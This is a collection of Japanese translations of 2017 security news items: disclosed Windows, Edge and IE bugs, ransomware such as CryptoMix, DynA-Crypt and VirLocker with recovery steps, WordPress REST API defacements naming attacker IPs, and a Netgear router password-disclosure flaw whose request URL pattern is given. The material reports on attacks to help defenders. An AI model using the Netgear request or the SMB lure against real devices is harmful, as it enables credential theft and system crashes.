    ターゲットにされている国別Top 10

     これまでは、マレーシアを本拠とする団体が、この攻撃の矛先で傷つけられた。しかし、英国、ドイツ、レバノン、その他の国々も遅れをとっていない
     Adwindの進化(並びに、地下の市場や他の暗黒Webフォーラムでの商業的入手性)した場合には、団体は彼等のJavaの使用を、そのソフトウェアが適切に機能するために絶対に必要とされる僅かなアプリケーションに制限しなければならない。
     可能なら、各企業は、セキュリティを更に一歩進め、彼等の他のエンドポイントから、これらのアプリケーションを分離しなさい。


    Googleが、Microsoft EdgeとIEの未パッチの脆弱性を公開した
    BleepingComputer : News>Security (2017/02/24)
     Googleが、先週Windows GDIコンポーネント中のバグの詳細を公開した後、Microsoftの製品中の第二の未パッチの脆弱性に関する詳細を公開した。今回は、EdgeとInternet Explorerに関するものである。
     記述している時点で、「一部の顧客が影響を受ける差し迫った問題」を引用し、Microsoftが、2月の定例のパッチをキャンセルしたので、このバグは未パッチのまま残されている。

    EdgeとIEに影響を与えるType Confusion問題

     GoogleのProject Zeroの研究者Ivan Fratricによって発見されたこのバグは、CVE-2017-0037識別子によって追跡される。この問題は、攻撃者が影響を受けているマシンでコードを実行したり、デバイスを乗っ取ることを可能にする種類のセキュリティフローであるType Confusion(【訳注】 データ型を誤って処理することで発生する問題)である。
     CVE-2017-0037に関する詳細は、Proof-of-Concept(実証実験、PoC)コードが付属するGoogleのバグレポートで利用可能である。PoCコードは、この脆弱性の残っているブラウザをクラッシュさせるが、攻撃者の能力水準に応じて、より危険な悪用が構築されるだろう。
     Fratricは、このバグを昨年の11月末に発見し、Googleが問題を解消すべき企業に対して与えている90日間の猶予期限が切れた本日公開した。

    2月の定例パッチのキャンセルと、その因果関係

     Microsoftが今月の定例のアップデートで、このバグへのパッチを予定していたか否かは不明である。
     EdgeとIEのバグに加えて、Microsoft製品は、他の二つの緊急のセキュリティフローを塞がれなければならない。一つは、Windows GDIコンポーネントのフローであり、他の一つは、全てのWindows OSのバジョンに同梱されているSMBファイル共有プロトコルである。
     良いニュースは、これらのフローは未パッチのままであるが、0-Dayではない。これらの問題のどれかを攻撃者が使用したという事件は、未だレポートされていない。
     Microsoftは先週、3月の定例パッチ(3月15日に予定されている)で、2月の定例パッチもリリースする予定であると発言している。
     その一方で、Microsoftは、Windows 10に含まれるAdobe Flash Playerをアップデートした今週、幾つかのセキュリティアップデートを出荷している。


    Avastが、CryptoMix身代金要求型マルウェアの復号プログラム(オフライン バージョン)をリリースした
    BleepingComputer : News>Security (2017/02/23)
     本日、Avastが、オフラインモードの間に暗号化されたCryptoMixの犠牲者のために復号プログラムをリリースした。オフラインモードは、インターネットに接続していない、あるいは、そのコンピュータが、この身代金要求型マルウェアのコマンド&コントロール サーバに接続できていない間に、この身代金要求型マルウェアが稼働し犠牲者のコンピュータを暗号化するものである。
     CryptoMixがオフラインモードでファイルを暗号化する時、研究者が再現することのできる暗号化キーを使用する。これらのキーは、犠牲者のファイルを試し、復号するために使用することができる。そして、これらのキーの一つが動作した場合、これは、犠牲者がオフラインモードで暗号化されており、このキーがコンピュータ全体を復号するために使用できることを意味している。
     現在、この復号プログラムは、.CRYPTOSHIELD, .scl, .rscl, .lesli, .rdmk, .code, .rmd ファイルを復号するために使用することができる。憶えておかなければならないことは、暗号化されたファイルが、これらの拡張子の一つを含んでいたとしても、オフライン モードで暗号化されたか否か不明なので、復号されるという保証はないということである。
     それでも、私は、CryptoMixに感染した全ての犠牲者は、必ずこの復号プログラムを試すように提案する。疑問や、この復号プログラムの操作に支援を必要とする人は、我々の CryptoMix Help & Support Topic で気楽に質問しなさい。

    Avastの復号プログラムを使用して、オフラインで暗号化されたCryptoMixファイルを復号する方法

     オフラインCryptoMix暗号化で暗号化されたファイルを復号するには、ユーザは暗号化されたファイルと、それと同一の暗号化されていないファイルの両方のバージョンを持っていなければならない。暗号化されたファイルと一致する暗号化されていないファイルを見つけるには、 C:\Users\Public\Pictures\Sample Pictures のサンプル ピクチャ フォルダを使用するように提案する。このフォルダの画像は、大抵は暗号化されるが、その暗号化されていないバージョンは、簡単に他のコンピュータからダウンロードすることができる。
     これを実行するには、http://rumkin.com/tools/cipher/rot13.php に進み、暗号化されたファイルのファイル名を入力しなさい(但し、.CRYPTOSHIELD拡張子は外す)。例えば、暗号化されたファイルが、 CRATHVAF.WCT.CRYPTOSHIELD と名付けられているのであれば、 そのWebサイトでは、CRATHVAF.WCT とだけ入力しなさい。ファイル名を入力したら、このWebサイトは自動的に、そのファイルを復号するので、あなたは、以下に示したようにオリジナルのファイル名を確認できる。


    ファイル名を復号中のROT-13D(画像はクリックすると拡大します)
    (【訳注】 ブラウザがJavaScript 1.2をサポートしていない場合は、最新のバージョンを取得しなければならない)

     上の画像で見られるように、この復号されたファイル名はPenguins.jpgである。これで、我々は、暗号化されたファイルのオリジナルのファイル名を認識したので、他のコンピュータから暗号化されていないバージョンを、Decryptフォルダ(【訳注】 このフォルダは、デスクトップに先に作成しておく)中にコピーすることができる。
     Decryptフォルダに、暗号化されたファイルと暗号化されていないファイルの両方が揃ったので、このフォルダは、以下の画像のようになっているはずである。


    Decryptフォルダ

     我々はファイルのペアを持ったので、復号プロセスを開始することができる。Avast WebサイトからCryptoMix復号プログラムをダウンロードするには、以下のリンクを使用し、デスクトップに保存する。

    Avast CryptoMix復号プログラム(直リンク)

     ファイルをダウンロードしたら、ダブルクリックして、avast_decryptor_cryptomix.exe を実行する。このプログラムが起動すると、以下に示す、この復号プログラムのメイン画面が表示される。


    CryptoMix復号プログラム

     ここでは、Next> ボタンをクリックする。これで、復号したいドライブの選択を要求する画面が表示される。 以下に示す画面で、あなたが復号したい各ドライブやフォルダを追加しなさい。


    復号場所の選択

     復号したい場所の全てを選択したら、Next> ボタンをクリックする。これで、暗号化されたファイルと暗号化されていないファイルのペアを選択するように要請される。我々は、このペアのファイルをデスクトップのDecryptフォルダに置いてある。


    暗号化されたファイルと暗号化されていないファイルのペアを追加する

     上の画像の各フィールドで、フィールドの右にある … の付いた矩形のボタンをクリックし、デスクトップのDecryptフォルダから適切なファイルを選択する。我々が暗号化されたファイルと、それと同一の暗号化されていないファイルを選択したら、Next> ボタンをクリックする。これで、以下に示すファイルのキーの検索を要請する画面が表示される。


    パスワードをクラックする画面

     準備が整ったので、Startボタンをクリックする。復号プログラムは、多くの既知の復号キーであなたのファイルをチェックする。復号キーが発見されると、以下類似の画面が表示される。


    CryptoMix復号パスワードが発見された

     ここで、Next> ボタンをクリックすると、あなたが選択できる幾つかの復号オプションの付いた画面が表示される。


    復号オプション

     上の画像に示してあるように、二つのオプションの両方を有効にするように提案する。あなたが、どのオプションを有効にするのか決定したら、CryptoMixで暗号化されたファイルの復号を開始するために、Decryptボタンをクリックしなさい。この復号プロセスには、かなり時間が掛かる。我慢しなさい。


    CryptoMixで暗号化されたファイルを復号中

     復号が終了すると、以下のような画像が表示される。


    復号終了

     これで復号は完了したので、この復号プログラムを終了しなさい。
     この復号プログラムが、あなたのファイルを復号できなかったなら、暗号化される時点で、あなたのコンピュータがオフラインでなかったことを意味している。あるいは、まだ復元できない特別なキーで暗号化されたことを意味している。おそらく、キーは将来発見されるだろう。

    復号できる暗号化されたオフライン ファイル拡張子

    .CRYPTOSHIELD
    .scl
    .rscl
    .lesli
    .rdmk
    .code
    .rmd


    Microsoftが定例のパッチを遅延した後、GoogleがWindowsのバグを公開した
    BleepingComputer : News>Security (2017/02/18)
     三ヶ月間で二度目、Googleの技術者は、Microsoftが修正をリリースしていないWindows OS中のバグを公開した。その後、Googleがアナウンスした。
     問題のバグは、Windows GDI(Graphics Device Interface、gdi32.dll)に影響を与える。これは、ビデオ ディスプレイとローカル プリンタの両方でグラフィックスとフォーマットされたテキストをアプリケーションが使用するのを可能にするライブラリである。

    このバグは、2016年06月不完全に修正されていた

     GoogleのProject Zeroチームのバグ レポートによれば、このバグは当初、2016年06月に発見された問題の大規模なコレクションの一部であった。そして、2016年07月に、Microsoftのセキュリティ ブレティンMS-16-074で修正された。
     Mateusz Jurczyk(最初にこのバグを見つけたGoogleのエンジニア)は、MS16-074のパッチは不満足なものであり、問題の一部は脆弱性のあるままにされていたと発言している。
     継続されたテストに基づき、この研究者は11月に、彼のバグレポートを再提出した。Microsoftは、90日間(Googleがベンダにバグの修正を許容している期間であり、これを過ぎるとバグは公開される)でバグの修正をすることができなかった。

    これは初めてのことではない

     Googleが、Microsoftにこのステップを採ったのは2016年11月(Microsoftが11月のパッチをリリースする数日前にATP28(Strontium、ストロンチウム)として知られるサイバースパイ集団によって悪用された0-Day攻撃に関する詳細の公開)以来二回目である。
     その時、Googleは、Microsoftがパッチを公開するまでユーザが自身を保護できるように、このステップを採ったと発言していた。
     MicrosoftのTerry Myerson(Windows and Device Group部長)は、Googleと同じ立場でこのバグを見ようとせず、Googleが顧客に大きなリスクを負わせたことに「失望した」と発言していた。

    Microsoftがパッチを遅延させたために、このバグは今月修正されない

     Myersonは、またしても同じスタンスに立つことができなかった。そのために、Googleは、02月14日(Microsoftがパッチをリリースするパッチの水曜日同日)に、この最新の未パッチのバグを公開した。
     Microsoftは、「一部の顧客が影響を受ける差し迫った問題」を引用し、今月のセキュリティ アップデートを来月まで先延ばしにした
     Googleの決定は、Microsoftの腹づもりに対する直接的な答えであるだけでなく、今月の全てのセキュリティアップデートを止めた。今月予定されていたパッチは、ひょっとして、Microsoftのエンジニアが「差し迫った問題」で躓かなかったなら、受け取っていたかもしれない。

    このバグはIEとOfficeオンラインのユーザに影響を与える

     GoogleのJurczykによると、Microsoftがパッチしていないこの問題(CVE-2017-0038として追跡される)は、攻撃者が悪意あるEMFファイルを使用してユーザのメモリの内容を読むことを可能にする。悪いニュースは、EMFファイルは他のドキュメント中に隠すことができるということである。
     「私は、Internet Explorerでローカルに、Office Onlineでリモートに、特別に細工したEMFファイルを含む .docx ドキュメントを介して、この脆弱性が再現することを確認した」と、Jurczykは説明している。
     攻撃のこれらのタイプの重大性は、悪意あるEMFファイルがメモリ中で実行する場所に依存し、どのようなデータタイプが、そのバイトの近くに存在しているかに依存する。

    緩和策は存在しない

     Googleのセキュリティ エキスパートは、このセキュリティ バグを悪用した攻撃に対する如何なる緩和策も提供していない。
     Windowsユーザは、Microsoftが02月と03月の両方のパッチを配布することを計画している03月15日まで、攻撃に対する脆弱性を残したまま放置されるだろう。
     Jurczykが未パッチのWindows GDIフローを公開した日に、Google Project Zeroチームの他のメンバーは、Microsoftが、過去にWindows NVIDIAドライバにパッチした16のセキュリティフローの詳細を公開した。これらの問題は、今回のJurczykの発見とは関連していない。


    DynA-Cryptはファイルを暗号化するだけでなく、あなたの情報も盗む
    BleepingComputer : News>Security (2017/02/07)
    【訳者より】 DynA-Crypt感染は復号可能ですが、復号方法は記述されていません。末尾に記しておきますが、BleepingComputerに登録し、この記事へコメントすることで復号方法を提供するとされています。

     DynA-Cryptと呼ばれる新しい身代金要求型マルウェアが、GDataマルウェア解析アナリストKarsten Hahnによって発見された。この身代金要求型マルウェアは、犠牲者のデータを暗号化するだけでなく、犠牲者のコンピュータから山のような情報も盗む。身代金要求型マルウェアと情報を盗む感染は、ありがちなものであるが、DynA-Cryptのように、この二つをグチャグチャに結合すると、犠牲者のプログラムとデータを台無しにする山のような **** 蒸気を立ち上らせたままにする。
     この問題は、この身代金要求型マルウェアが、多数のスタンドアロンの実行ファイルと、それらが実行するアクションの一部で意味をなさないPowerShellスクリプトで構成されていることにある。このマルウェアは、犠牲者のパスワードと連絡先を盗んでいる間にファイルを暗号化するだけでなく、犠牲者のファイルを何処にもバックアップせずに削除する。

    DynA-Cryptは、犠牲者のデータを削除している間に山のような情報を盗む

     PCriskによると、このプログラムは、誰もが独自のマルウェアを作成して犯罪者になることを可能にするマルウェア作成キットによって作成されている。これは、誰もが動作するマルウェアを簡単に作成できることを意味しているが、実行していることの意味を知らない人々も同様に、動作するマルウェアを作成できることを意味している。DynA-Cryptは、このケースのように思われる。
     次のセクションで説明するように、DynA-Cryptの一部分である身代金要求型マルウェアに関しては悩みの種であるが、現実の問題は、このプログラムがコンピュータから盗むデータと情報量にある。稼働している間、DynA-Cryptは、犠牲者のアクティブデスクトップのスクリーンショットを取得し、コンピュータのシステムサウンドを録音し、犠牲者がキーボードでタイプしたコマンドをログし、多数のインストールされているプログラムからデータを盗む。
     DynA-Cryptが盗むプログラムとデータは以下を含む:

      ・ Screenshots
      ・ Skype
      ・ Steam
      ・ Chrome
      ・ Thunderbird
      ・ Minecraft
      ・ TeamSpeak
      ・ Firefox
      ・ システムオーディオの録音

     このデータが盗まれている時、このマルウェアは、%LocalAppData%\dyna\loot\ と名付けられたフォルダに、盗んだデータをコピーし、開発者に送信する準備ができると、%LocalAppData%\loot.zip と名付けられたファイルに、その全てをZIPで圧縮し、以下に示したように、そのZIPファイルを開発者にeMailする。

    問題は、このマルウェアが犠牲者のデータを盗んだ後、明確な理由もなく盗んだ多くのフォルダを削除するということにある。

     犠牲者のデータを盗むことと、それに関して侮辱することとは別物である。開発者がファイルを削除しても絶対に得るものはない。彼等は得ようとしたものを既に得ている、そして、私は犠牲者を馬鹿にしたところで便益はないと確信している。更に悪いことは、このマルウェアは、デスクトップにあるものを全部削除する。そこから何かを盗むわけでもなく。

    DynA-Cryptの身代金要求型マルウェア部分は、復号できる

     DynA-Crypt身代金要求型マルウェアは、犠牲者のデータを暗号化するためのAESと呼ばれるスタンドアロン プログラムを使用するPowerShellスクリプトによって稼働されている。このスクリプトは、以下の拡張子に一致するファイルに関してコンピュータを検索し、一致したファイルを暗号化する。

      .jpg, .jpeg, .docx, .doc, .xlsx, .xls, .ppt, .pdf, .mp4, .mp3, .mov, .mkv, .png,
      .pst, .odt, .avi, .pptx, .msg, .rar, .mdb, .zip, .m4a, .csv, .001

     このマルウェアは、ファイルを暗号化すると、暗号化したファイル名に .crypt 拡張子を追加する。これは、test.jpg というファイルが暗号化されると test.jpg.crypt にリネームされることを意味している。この身代金要求型マルウェアは、犠牲者のコンピュータのシャドー ボリューム コピーも削除するので、これを使用してファイルを復元するのは不可能である。
     コンピュータの暗号化が終了すると、DynA-Cryptは、囲まれているBitcoinアドレスに $50 USD分をBitcoinで支払うように要求するロック画面を表示する。幸いなことに、現時点まで、誰も身代金を支払っていない。


    DynA-Crypt身代金要求型マルウェア

     良いニュースは、DynA-Cryptの身代金要求型マルウェア部分は、簡単に復号することができるので、このプログラムに感染しても身代金を支払う必要は全く無い。あなたが、この身代金要求型マルウェアに関して支援を必要とするのであるのなら、此処にコメントを残しなさい。復号プログラムが提供されるだろう。

    【訳者より】
    この復号プログラムを取得するには

    1/ 以下のサイトにアクセスする。
    https://www.bleepingcomputer.com/news/security/dyna-crypt-not-only-encrypts-your-files-but-also-steals-your-info/

    2/ 記事本文の下にある Post a Commentにある Register Now をクリックしてユーザ登録を行う。

    3/ 再び、このサイトに戻り、Register Now の上にある Login ボタンを押しログインする。

    4/ 必ず英文でコメントする。

      5/ 以下、BleepingComputer担当者の指示に従う。

     

    67000を超えるWebサイトが最近パッチされたWordPressのバグで改変されている
    BleepingComputer : News>Security (2017/02/07)
     先週リリースされた一番最近のバージョン v4.7.2にアップデートしていないWordPressサイトは、四つのハッキンググループが実行している巨大な改変作戦の下にある。
     詳細な脆弱性がこの前の月曜日に公開された後に、この攻撃を検出したWebセキュリティ企業Sucuriによると、この攻撃は、ゆっくりと拡大しており、一日あたり約3000のサイトが改変されている。


    時系列での、REST APIフローを介した改変の試み

     攻撃者はWordPressのREST API中の脆弱性(WordPressチームがほぼ二週間前に修正したが、彼等は、この月曜日に詳細を公開した)を悪用している。
     この脆弱性は、遠隔の攻撃者が、REST APIエンドポイントへの接続を確認するHTTPリクエストを細工し、ユーザのWebサイトのタイトルやコンテンツを改造するすることを可能にするものである。
     Securiによると、このフローが悪用されていることは自明であり、先週からオンラインに幾つかの悪用が公開されている。

    67000を超えるWebサイトが既に改変された

     この脆弱性はWordPress 4.7.0と4.7.1に影響を与えるだけであり、このCMSがセキュリティ問題に関して自動アップデートの機能を組み込んでいるにも拘わらず、多くのWebサイトでアップデートされていない。
     Sucuriのhoneypotテストサーバから収集されたデータに基づくと、このフローを悪用しようとしている四つの攻撃者グループが先週活動していた。

    グループ名 IP 見積もられる犠牲者数
    w4l3XzY3 176.9.36.102
    185.116.213.71
    134.213.54.163
    2a00:1a48:7808:104:9b57:dda6:eb3c:61e1 (IPv6 address)
    66000
    Cyb3r-Shia 37.237.192.22 500
    By+NeT.Defacer 144.217.81.160 500
    By+Hawleri_hacker 144.217.81.160 500

     この攻撃は数日間続いたので、Googleは、これら改変されたサイトの一部をインデックスすることを始めてしまっていた。


    Googleによってインデックスされた改変されたWebサイト

     現在、Webサイトを改変するためにREST APIを使用しているグループは、彼等のブランドを人目に晒すためだけに実行している(彼等の名前を追加することによってページタイトルと彼等のコンテンツに変更しているだけ)。


    改変されたサイトの一つ

     SucuriのCTO,Daniel Cidは、リンクや画像のようなより複雑なコンテンツを投稿するために脆弱性を利用したSEO(検索エンジン最適化)スパムグループのような専門的な改変者が囲いの中に入るのを見るだろうと予測している
     この種類の改変は、他のサイトのSEOランキングを上げるためや、いかがわしい製品の販売促進に使用される。SEOターゲット改変を被ったWebサイトは、影響を受けたことを示すSERP(検索エンジン結果ページ)を持つことになり、検索エンジンでの彼等の評価を落とすリスク(彼らのサイトへのトラフィックを減少させる)を有することになる。
     Webサイトの所有者は、REST APIに起因してGoogleで表示されなくなることを回避するために、可能な限り早急にWordPress 4.7.2にアップデートするようアドバイスされている。


    新たなSMBバグ: Link of Death(死のリンク)でWindowsシステムはクラッシュする
    The Register : Security (2017/02/04)
     【訳注】 SMB: Server Message Block。ネットワークを通じてコンピュータ間でファイルやプリンタ、シリアルポートなどを共有するためのプロトコルのこと(IT用語辞典より)。

     火曜日、US CERTは現在サポートされているWindowsの全てのバージョンに、遠隔からコンピュータをクラッシュさせるために悪用することができるメモリ損壊のバグに対する脆弱性があると警告するセキュリティ アドバイザリをリリースした。
     「Windowsは、SMB2 TREE_CONNECT応答構造体で定義される構造に従い、大変多くのバイトを含む特別に細工されたサーバの応答を適切に操作することに失敗する」、続けて「悪意あるSMBサーバに接続することによって、脆弱性のあるWindowsクライアント システムは、mrxsmb20.sys中でクラッシュ(BSOD)する」と、US CERTは発言している。
     この脆弱性は当初、共通脆弱性評価システムで10に評価されていたが、7.8にダウングレードされた。この脆弱性を悪用するには、攻撃者はWindowsシステムを悪意あるSMB共有に接続する必要がある。
     例えば、これは、犠牲者を欺き、OutlookでeMailにシェアされている悪意あるリンクをクリックするこで実行される。もしくは、邪悪なファイルサーバへのソースURLを付けた不可視画像をWebページに埋め込み、Internet Explorerを使用して、そのサイトを訪問するようにすることで実行される。この結果は、不幸なユーザに何処からともなくBSODシステム クラッシュを引き起こすことになる。
     セキュリティ研究者Laurent Gaffie(eにウムラウト)がThe Registerに告げたところによると、このバグはNULLポインタ デリファレンスに関係している。彼とMicrosoftは共に、この問題が、遠隔からのdenial of service(DoS)攻撃を導くことを潜在的に意味しているが、遠隔からのコード実行は意味していないと考えている。
     このバグは、ローカル(NetbiosやLLMNR被毒を介して)もしくは、UNCリンクを介して遠隔からの何れかでターゲットを再起動するために使用される。
    「この明白なバグは、即座にSDLCプロセスによって捕獲されなければならなかったが、驚くことに捕獲されなかったことに注意することは重要である。」 続けて、「これは、新しいコードベースが、Microsoftの最新のオペレーティングシステムを出荷する前に、単純に検証されていないことを意味している」と、Gaffieは発言している。
     Gaffieは、このバグを2016年11月25日にMicrosftに提示し、Microsoftは、12月の定例パッチで用意が整っていた、と発言している。
     Microsoftは、2月まで、この修正を遅らせた。これは、12月に一つ修正するより、一度に幾つものSMB修正をリリースしたほうが、彼等にとっては理にかなっているためであると、彼は説明している。
     他のセキュリティ研究者も、このバグを見つけたので、Gaffieはパッチがリリースされる一週間前に、このバグを公開することを決定したと、彼は発言している。これは、彼が無償でMicrosoftを支援する作業を実行しているにも拘わらず、Microsoftが、彼が通知した脆弱性を抑えつけておくのは、これが初めてのことではないからである。
     「Microsoftが、このようなバグを伏せている間、Microsoftは、彼等のユーザに、マーケティング ダメージ コントロールを実行することを除いて何の支援もしていない」、続けて、「この態度は、彼等のユーザに対して間違っているものであり、セキュリティ コミュニティのためには更に悪い」と、発言している。
     GaffieはGitHubを介して、脆弱性の概念実証をリリースしている。


    多くのNetgearルータにパスワードを盗まれるセキュリティホールが発見された
    ESET : We Live Security (2017/01/31)
     或るセキュリティ研究者は、何十ものNetgearルータ中に深刻なセキュリティ ホール(「百万台を超えるとは言わないまでも、数十万台」のデバイスが、ハッカーによって管理者パスワードを盗まれるリスクがあることを意味する)を発見した方法を説明している。
     Trustwaveの研究者Simon Keninは、寒き雨の冬に真の怠惰が、ルータを再起動するためにベッドから出て、階下に行くことを、如何にして彼を押し留めたのかを説明している。代わりに、彼はベッドの中にいて、アクセスパスワードを忘れた時に、そのデバイスのWeb管理者パネルに侵入する方法があるか否かを調査した。
     恐ろしいことに、Keninは、彼が実行する必要のあった唯一のことは、その管理者パスワードを取得するために、2014年に他のNetgearルータで発見された二つのセキュリティ フローを使用して、ルータ マネージメント ソフトウェアに簡単なWebリクエストを送信することであったことを発見した。

     Webパネルにアクセスすることを試みると、ユーザは、認証を求められる。この認証をキャンセルすると、パスワードの復元は許可されない。ユーザはパスワード復旧トークンを露出するページにリダイレクトされる。ユーザが、このページ http://router/passwordrecovered.cgi?id=TOKEN(そして、パスワードの復元は許可されない)に正しいトークンを提供すると、彼等はルータ用の管理者パスワードを受け取る。

     明らかになったことによると、このルータの管理者パスワードは、攻撃者が正当なパスワード復旧トークンを送信しない場合でさえ取得することができる。 

     あなたがどのようなパラメータを送っても、passwordrecovered.cgiへの第一のコールは、証明書を渡すことであることを、私は発見した。これは、私が他の如何なる場所でも見たことのない完全に新しいバグである。私は、異なるNetgearのモデルで、この二つのバグをテストした時、私の二つ目のバグは、大変幅広いモデルで動作することを発見した。

     Keninは、同じWi-Fiネットワーク上にいるのに、このルータが、このフローに弱いことを公表したことは拙いことだが、彼が決定したことは、このルータのリモート マネージメント用のオプションが許可されていた場合、この脆弱性は悪意ある攻撃者によって遠隔から悪用されることが可能であるということである。
     幸いなことに、このリモート マネージメント機能はNetgearのルータではDefaultで無効にされているので、悪意あるハッカーが、このフローを悪用しようとするチャンスには、多少の障害がある。しかし、Keninによると、百万とは言わないまでも数十万のデバイスは、公衆インターネットを介してアクセス可能であるので、悪用の最大の危険を考慮すべきである、としている。
     サポート アドバイザリで、Netgearは、ユーザが、彼等のルータのファームウェアを完全にアップデートしていることを確認するように推奨している。
     以下のファームウェアがパッチされていない場合、多数のNetgearルータは、彼が明らかにしたセキュリティホールに対して脆弱であると、Keninは主張している。

    AC1450 V1.0.0.34_10.0.16 (最新版)
    AC1450 V1.0.0.22_1.0.10
    AC1450 V1.0.0.14_1.0.6
    D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52以降は影響を受けない)
    D6400 V1.0.0.34_1.3.34
    D6400 V1.0.0.38_1.1.38
    D6400 V1.0.0.22_1.0.22
    DC112A V1.0.0.30_1.0.60 (最新版)
    DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66が最新で、影響を受けない)
    JNDR3000 V1.0.0.18_1.0.16 (最新版)
    R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41以降は影響を受けない)
    R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10が最新で、影響を受けない)
    R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10が最新で、影響を受けない)
    R6300 V1.0.2.78_1.0.58 (最新版)
    R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76が最新で、パッチされている)
    R6300v2 V1.0.3.30_10.0.73
    R6700 V1.0.1.14_10.0.29 (最新版だがベータ)
    R6700 V1.0.0.26_10.0.26 (最新版、且つ、安定版)
    R6700 V1.0.0.24_10.0.18
    R6900 V1.0.0.4_1.0.10 (最新版)
    R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93が最新で、パッチされている)
    R8300 V1.0.2.48_1.0.52
    R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62以降はパッチされている)
    R8500 V1.0.2.26_1.0.41
    R8500 V1.0.0.56_1.0.28
    R8500 V1.0.0.20_1.0.11
    VEGN2610 V1.0.0.35_1.0.35 (最新版)
    VEGN2610 V1.0.0.29_1.0.29
    VEGN2610 V1.0.0.27_1.0.27
    WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81が最新で、影響を受けない)
    WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51が最新で、影響を受けない)
    WNDR3700v3 V1.0.0.38_1.0.31 (最新版)
    WNDR4000 V1.0.2.4_9.1.86 (最新版)
    WNDR4500 V1.0.1.40_1.0.68 (最新版)
    WNDR4500v2 V1.0.0.60_1.0.38 (最新版)
    WNDR4500v2 V1.0.0.42_1.0.25
    WGR614v10 V1.0.2.60_60.0.85NA (最新版)
    WGR614v10 V1.0.2.58_60.0.84NA
    WGR614v10 V1.0.2.54_60.0.82NA
    WN3100RP V1.0.0.14_1.0.19 (最新版)
    WN3100RP V1.0.0.6_1.0.12
    Lenovo R3220 V1.0.0.16_1.0.16 (最新版)
    Lenovo R3220 V1.0.0.13_1.0.13

     先月、我々は、Netgearルータを遠隔から悪用できる様々な方法を、CERTが警告していることをレポートした。
     Keninは、Netgearが、この問題を深刻に受け止めていると信じている。彼は昨年責任を持って、この脆弱性を公開している。そして、Netgearは、「積極的なスケジュールで、現在未パッチのモデルのファームウェアをリリースすることに専念している」とレポートしている。
     更に、Netgearは、Bugcrowdバグ報奨金サービス(脆弱性研究者が、その会社のセキュリティ チームとより簡単に情報交換し、彼等が発見し、責任を持って公開したフローの詳細に関して報奨を得るためのメカニズムを提供するもの)に参加していた。
     結果は、「より安全な製品系列とサービス」でなければならないと、Keninは発言している。
    Netgearはともかく、真実は、全てのルータメーカーが、本当に彼等のデバイスを安全にするより良い仕事を実行し始める必要があるということである。結局、ますます安全性の低いデバイスがインターネットに接続されているので、我々全てにとって、インターネットは安全性の低い場所となっている。

    VirLockerは、以前より悪性になって回帰している。復号可能
    BleepingComputer : News>Security (2017/01/18)
     VirLocker身代金要求型マルウェアが、ここ数週間、新しくなり、そして、大変悪性になって回帰している。しかし、Malwarebytesのセキュリティチームは、犠牲者が支払いフィールド中に特定のコードを入力することによって、ファイルを復元することができる方法があると発言している。
     VirLocker(VirLockVirRansomとしても知られる)は、2014年に最初にBleeping Computerによって発見され、当初、Operation Global Vとして参照された身代金要求型マルウェア ファミリーである。
     この身代金要求型マルウェアは、最初のバージョンの後、決していなくなっていたわけではなく、TorrentLocker、CryptoLocker、TeslaCryptや、より最近のCerber、Lockyを押し付けてくるような巨大なスパムキャンペーンの中心に決して存在せず、控えめにしていただけである。新しいバージョン(2016年のものや、今週Malwarebytesが発見したもの)は現れ続けていた。

    或るコードでVirLockerは削除できる

     長期に渡りBleeping Computerのフォーラムで活躍しているユーザであり、Malwarebytesのセキュリティ研究者Nathan Scottによると、この最近のバージョンは、特定の復号プログラムなしに打ち負かすことができる、としている。
     このトリックは、"Transfer ID"セクション中のVirLocker脅迫文中に64個の 0 を入力することだと、Scottは発言している。

    0000000000000000000000000000000000000000000000000000000000000000

     このコードは、この身代金要求型マルウェアを欺き、犠牲者が身代金を支払ったと思い込ませる。しかし、ユーザの作業は未だ終了していない。まだ始まったばかりである。

    VirLockerは、全てのファイルを暗号化し実行ファイルの内部に格納する

     VirLockerの感染プロセスは、2014年当時と殆どの部分で同じである。犠牲者のファイルを奪い、これをEXE Shell内部に包み込む。これは、全てのファイルが暗号化され、次に実行ファイルとして詰め直されることを意味している。
     例えば、photo.pngという名前の画像ファイルは、photo.png.exeになる。殆どのWindowsインストレーションは、最後のファイル拡張子を非表示にするので、ユーザは、photo.pngを見るだけで、このファイルがバイナリであることを認識しない。
     しかし、以前より更に悪くなっているのは、これらのEXEファイルの一つ一つがVirLocker身代金要求型マルウェアのコピーを含むことにある。これは、一部の犠牲者が、彼等の友人に悪意あるファイルを拡散する可能性があることを、あるいは、認識することなく、VirLockerのコピーをバックアップすることを意味している。VirLockerが実際にEXEファイルを作成し、インチキの .exe 拡張子を追加しないという事実は、VirLockerを大変危険なものにしている(簡単に拡散することが可能)。

    あなたの全ファイルを復号するには時間がかかるだろう

    Scottは、64個の 0 を入力した犠牲者は、直ちに彼等の全ての重要なファイル(確保しておきたいファイル)を開き始めなければならない、と発言している。
     犠牲者は、重要なファイルを暗号化し格納している、そのEXEファイルをダブルクリックしなければならない。このEXEファイル(埋め込まれているVirLockerの変種)は、身代金が支払われたと理解し、このEXEファイルの内部からオリジナルのファイルを解凍し復号し、ディスク上にコピーを作成する。
     例えば、photo.png.exeをダブルクリックすると、photo.pngと呼ばれる二つ目のファイルが作成される。これはオリジナルのファイルである。この汚染されているEXEファイルは、ディスク上のオリジナル ファイルの傍らに残っていることに注意しなさい。
     自動化された復号プロセスは存在しない。犠牲者は、ハードドライブを捜索し手動でファイルを解凍する必要がある。

    犠牲者はオリジナルのファイルを取り戻したら、ハードドライブからファイルを完全に消し去る必要がある

     犠牲者が、この操作を終了したら、犠牲者は、生きているVirLocker身代金要求型マルウェアを含む如何なるEXEバージョンもコピーしないように細心の注意を払って、彼等のオリジナル ファイルの全てをバックアップ ドライブに移動しなさい。危険なEXEロック ファイルを一つでもコピーすることは、新しいホストにVirLocker感染を拡散することになるか、後で、そのPCを再感染させるかの何れかになる。
     データをバックアップしたら、ディスク上に危険なファイルを残したままにしておくと、再感染の高い危険性があるので、犠牲者は、そのコンピュータを完全にクリーンにし、オペレーティングシステムを再インストールしなさい。
